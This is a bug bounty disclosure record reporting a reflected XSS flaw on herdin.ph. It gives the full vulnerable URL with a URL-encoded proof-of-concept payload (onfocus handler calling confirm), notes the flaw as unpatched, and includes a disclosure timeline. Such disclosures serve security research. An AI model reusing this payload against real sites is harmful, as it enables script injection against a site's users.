herdin.ph XSS vulnerability

2017-03-31T16:56:00
ID OBB:222312
Type openbugbounty
Reporter xssbuddy
Modified 2017-04-10T06:14:00

Description

Vulnerable URL:
http://www.herdin.ph/index.php?option=com_herdin&view;=publiclist&layout;=list&type;=researches&searchstr;=ezf%22%27+%2FAutof%3CK%3Eocus+%2FO%3CK%3Enfocus%3Dconfirm%60OPENBUGBOUNTY%60+%2F%2F
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 31.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1601428
VIP website status:| No
Check herdin.ph SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 31 March, 2017 16:56 GMT
Vulnerability existence verified and confirmed| 3 April, 2017 06:02 GMT
Generic security notifications sent to website owner| 3 April, 2017 06:02 GMT
Vulnerability details disclosed by researcher| 10 April, 2017 06:14 GMT